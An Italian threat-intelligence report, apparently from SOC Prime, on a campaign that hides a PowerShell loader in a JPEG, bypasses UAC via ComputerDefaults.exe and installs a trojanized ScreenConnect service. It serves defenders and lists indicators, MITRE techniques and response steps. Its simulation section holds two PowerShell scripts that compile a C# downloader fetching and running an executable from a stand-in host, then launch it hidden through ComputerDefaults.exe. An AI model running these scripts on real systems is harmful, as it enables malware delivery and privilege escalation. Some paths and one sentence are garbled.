OPERAZIONE SILENTCANVAS: INTRUSIONE POWERSHELL MULTISTADIO BASATA SU JPEG

SOC Prime Team

Segui

OPERAZIONE SILENTCANVAS: INTRUSIONE POWERSHELL MULTISTADIO BASATA SU JPEG

Detection stack

AIDR
Alert
ETL
Query

Rapporto
Flusso di Attacco
Rilevamenti
Simulazioni

Riepilogo

Operazione SilentCanvas è un’intrusione sofisticata a più stadi che nasconde un payload malevolo in PowerShell all’interno di un file JPEG chiamato sysupdate.jpeg. Quel payload recupera e compila un launcher personalizzato, costruito tramite csc.exe, abusa di ComputerDefaults.exe per eseguire un bypass fileless UAC e installa un servizio ConnectWise ScreenConnect trojanizzato chiamato OneDriveServers per mantenere un accesso remoto persistente. Il malware comunica tramite canali criptati indirizzati a legitserver.theworkpc.com su porte 5443 and 8041. La campagna mostra anche una forte enfasi sull’evasione difensiva, il furto di credenziali e la sorveglianza nascosta.

Indagine

Il rapporto copre sia l’analisi statica che quella dinamica del loader basato su JPEG, il uds.exe binario compilato dinamicamente e i componenti modificati del ScreenConnect. I ricercatori hanno identificato diverse tecniche offensive, tra cui bypass AMSI, abuso di binari living-off-the-land, dirottamento dei registri e derivazione di chiavi personalizzate per la comunicazione criptata. L’analisi dell’infrastruttura ha rivelato una mappatura hard-coded tra legitserver.theworkpc.com e l’indirizzo IP 45.138.16.64. L’indagine ha anche esposto un profilo dettagliato delle vittime, la manipolazione degli account locali e la funzionalità legata all’accesso al desktop nascosto.

Mitigazione

I difensori dovrebbero applicare una rigida allow-listing per gli strumenti legittimi di monitoraggio e gestione remoti e limitare o monitorare da vicino l’esecuzione di csc.exe, cvtres.exe, e ComputerDefaults.exe. Il monitoraggio dovrebbe focalizzarsi anche su cambiamenti sospetti nei registri ms-settings, comportamenti di bypass AMSI in PowerShell, flag di creazione di processi nascosti e creazione non autorizzata di servizi che coinvolgono il nome registry changes, PowerShell AMSI bypass behavior, hidden process creation flags, and unauthorized service creation involving the name OneDriveServers. Qualsiasi account che potrebbe essere stato esposto dovrebbe essere resettato e i sistemi interessati dovrebbero essere immediatamente isolati per prevenire ulteriori abusi.

Risposta

Se vengono rilevati indicatori correlati, l’endpoint dovrebbe essere messo in quarantena immediatamente, il processo malevolo uds.exe e l’attività PowerShell associata dovrebbero essere terminati e il OneDriveServers servizio dovrebbe essere rimosso dall’host. Gli investigatori dovrebbero raccogliere artefatti di registro, binari di servizio e telemetria di rete legati all’infrastruttura di comando-e-controllo per una revisione forense più approfondita. Tutte le credenziali privilegiate dovrebbero essere ruotate e i difensori dovrebbero monitorare i modelli di spostamento laterale associati alle tecniche documentate nella campagna.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes u2013 Actions action_initial_access["Azione – T1566 Allegato di Phishing: L’email consegna un file malevolo sysupdate.jpeg mascherato da immagine."] class action_initial_access action action_user_execution["Azione – T1204.002 Esecuzione Utente e T1059.001 PowerShell: La vittima fa doppio clic sul .jpeg che lancia PowerShell incorporato."] class action_user_execution action action_execution["Azione – T1562.001 Disabilita Strumenti di Sicurezza (bypass AMSI) e T1027 Offuscamento: Lo script PowerShell evade la rilevazione e nasconde la logica malevola."] class action_execution action action_dev_utility_abuse["Azione – T1127 Compila Dopo la Consegna e T1027.004 File Offuscati/Archiviati: Lo script incorpora C# e compila con csc.exe per creare un launcher personalizzato."] class action_dev_utility_abuse action action_priv_esc["Azione – T1548.002 Dirottamento del Flusso di Esecuzione tramite protocollo ms-settings e T1218.002 File HTML Compilato utilizzando ComputerDefaults.exe per un bypass fileless UAC."] class action_priv_esc action action_persistence["Azione – T1543.003 Servizio Windows chiamato OneDriveServers e T1136.001 Account Locale creazione di account amministrativi nascosti per accesso a lungo termine."] class action_persistence action action_tool_hijack["Azione – T1553.002 Esecuzione di Proxy Firmato Binario: Distribuisce un binario ConnectWise ScreenConnect trojanizzato abusando di componenti legittimamente firmati."] class action_tool_hijack action action_credential_access["Azione – T1556.001 Intercettazione API delle Credenziali e T1056.001 Acquisizione di Input: Installa un hook del Fornitore di Credenziali e keylogger per raccogliere le credenziali utente."] class action_credential_access action action_collection["Azione – T1113 Acquisizione Schermo, T1125 Acquisizione Video, T1123 Acquisizione Audio, T1115 Dati Appunti: Raccoglie informazioni visive, audio e degli appunti."] class action_collection action action_discovery["Azione – T1518 Scoperta Software, T1010 Scoperta Finestra Applicazione, T1082 Scoperta Informazioni di Sistema: Enumera software installato, prodotti AV, informazioni di sistema e finestre attive."] class action_discovery action action_c2["Azione – T1573 Canale Criptato: Configura C2 criptato utilizzando chiavi PBKDF2/HMACu2011SHA256 e trasferisce ulteriori strumenti tramite T1105 Trasferimento Strumento di Ingresso."] class action_c2 action action_remote_execution["Azione – T1021 Servizi Remoti: Esegue comandi sulla vittima tramite il framework ScreenConnect."] class action_remote_execution action action_impact["Azione – T1529 Spegnimento/Riavvio di Sistema: Può innescare un riavvio di sistema o un riavvio in modalità sicura per interrompere l’ambiente."] class action_impact action %% Nodes u2013 Tools / Processes tool_sysupdate_jpeg["Strumento – Nome: sysupdate.jpeg Tipo: Allegato malevolo mascherato da immagine"] class tool_sysupdate_jpeg tool tool_powershell["Strumento – Nome: PowerShell Tipo: Motore di scripting utilizzato per esecuzione e offuscamento"] class tool_powershell tool tool_csc["Strumento – Nome: csc.exe Tipo: Compilatore C# utilizzato in-loco"] class tool_csc tool process_computerdefaults["Processo – Nome: ComputerDefaults.exe Descrizione: Usato come proxy per un bypass fileless UAC"] class process_computerdefaults process tool_screenconnect["Strumento – Nome: ConnectWise ScreenConnect Tipo: Software di accesso remoto dirottato con payload malevolo"] class tool_screenconnect tool malware_keylogger["Malware – Nome: Keylogger Personalizzato Scopo: Intercettare tasti e credenziali"] class malware_keylogger malware %% Connections u2013 Attack Flow action_initial_access –>|consegna| tool_sysupdate_jpeg tool_sysupdate_jpeg –>|innesca| action_user_execution action_user_execution –>|esegue| tool_powershell tool_powershell –>|esegue| action_execution action_execution –>|utilizza| tool_csc tool_csc –>|crea| action_dev_utility_abuse action_dev_utility_abuse –>|produces launcher for| action_priv_esc action_priv_esc –>|invokes| process_computerdefaults process_computerdefaults –>|abilita| action_persistence action_persistence –>|crea| action_tool_hijack action_tool_hijack –>|installa| tool_screenconnect tool_screenconnect –>|facilita| action_credential_access action_credential_access –>|installa| malware_keylogger malware_keylogger –>|abilita| action_collection action_collection –>|trasmette dati a| action_c2 action_c2 –>|supporta| action_remote_execution action_remote_execution –>|utilizza| tool_screenconnect action_remote_execution –>|conduce a| action_impact action_discovery –>|fornisce info per| action_c2 %% Styling class tool_sysupdate_jpeg tool class tool_powershell tool class tool_csc tool class tool_screenconnect tool class process_computerdefaults process class malware_keylogger malware "

Flusso di Attacco

Narrativa dell’Attacco e Comandi:

Piede d’appoggio iniziale: L’attaccante ottiene una sessione PowerShell a bassa privilegi sull’endpoint.
Compilazione in tempo reale: Utilizzando il csc.exegià disponibile, l’attaccante compila un downloader C# che scarica un payload di seconda fase da un server C2. La compilazione è avviata dal processo PowerShell per soddisfare la condizione parent-child.
Bypass UAC senza file: L’attaccante esegue l’eseguibile appena costruito tramite ComputerDefaults.exe, che richiede silenziosamente l’elevazione senza mostrare un prompt UAC.
Esecuzione post-elevazione: Il payload elevato stabilisce una shell inversa per l’avversario.

# Step 1 – Prepara il sorgente C# malevolo (in memoria)
$csSource = @"
using System;
using System.Net;
using System.Diagnostics;
public class Downloader {
    public static void Main() {
        using (WebClient wc = new WebClient()) {
            string payloadUrl = "http://malicious.example.com/payload.exe";
            string tempPath = System.IO.Path.Combine($env:TEMP, "payload.exe");
            wc.DownloadFile(payloadUrl, tempPath);
            Process.Start(tempPath);
        }
    }
}
"@

$srcPath = "$env:TEMPDownloader.cs"
$exePath = "$env:TEMPDownloader.exe"
$csSource | Out-File -FilePath $srcPath -Encoding ASCII

# Step 2 – Compilazione tramite csc.exe (parent = PowerShell)
& "$env:WINDIRMicrosoft.NETFramework64v4.0.30319csc.exe" /nologo /t:exe /out:$exePath $srcPath

# Step 3 – Attiva il bypass UAC usando ComputerDefaults.exe (ancora figlio di PowerShell)
$computerDefaults = "$env:SystemRootSystem32ComputerDefaults.exe"
Start-Process -FilePath $computerDefaults -ArgumentList "`"$exePath`"" -WindowStyle Hidden

Script di Test di Regressione: (script PowerShell autoconclusivo che riproduce i passaggi sopra)

# -----------------------------------------------------------------
# File: trigger_csc_uac_bypass.ps1
# Purpose: Simula la catena di attacco csc.exe + ComputerDefaults.exe
# -----------------------------------------------------------------

# Crea sorgente C# malevolo nella directory TEMP
$src = @"
using System;
using System.Net;
using System.Diagnostics;
public class Payload {
    public static void Main() {
        using (WebClient wc = new WebClient()) {
            string url = "http://example.com/evil.exe";
            string path = System.IO.Path.Combine($env:TEMP, "evil.exe");
            wc.DownloadFile(url, path);
            Process.Start(path);
        }
    }
}
"@

$srcPath = Join-Path $env:TEMP "Payload.cs"
$exePath = Join-Path $env:TEMP "Payload.exe"
$src | Out-File -FilePath $srcPath -Encoding ASCII

# Compila con csc.exe (questo processo PowerShell diventa il parent)
$csc = "$env:WINDIRMicrosoft.NETFramework64v4.0.30319csc.exe"
& $csc /nologo /t:exe /out:$exePath $srcPath

# Esegui tramite ComputerDefaults.exe per eseguire un UAC bypass silenzioso
$computerDefaults = "$env:SystemRootSystem32ComputerDefaults.exe"
Start-Process -FilePath $computerDefaults -ArgumentList "`"$exePath`"" -WindowStyle Hidden

Comandi di Pulizia:

# Rimuovi artefatti generati
Remove-Item -Path "$env:TEMPPayload.cs" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPPayload.exe" -Force -ErrorAction SilentlyContinue
# Opzionalmente termina tutti i processi persistenti avviati dal test
Get-Process -Name "evil" -ErrorAction SilentlyContinue | Stop-Process -Force

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis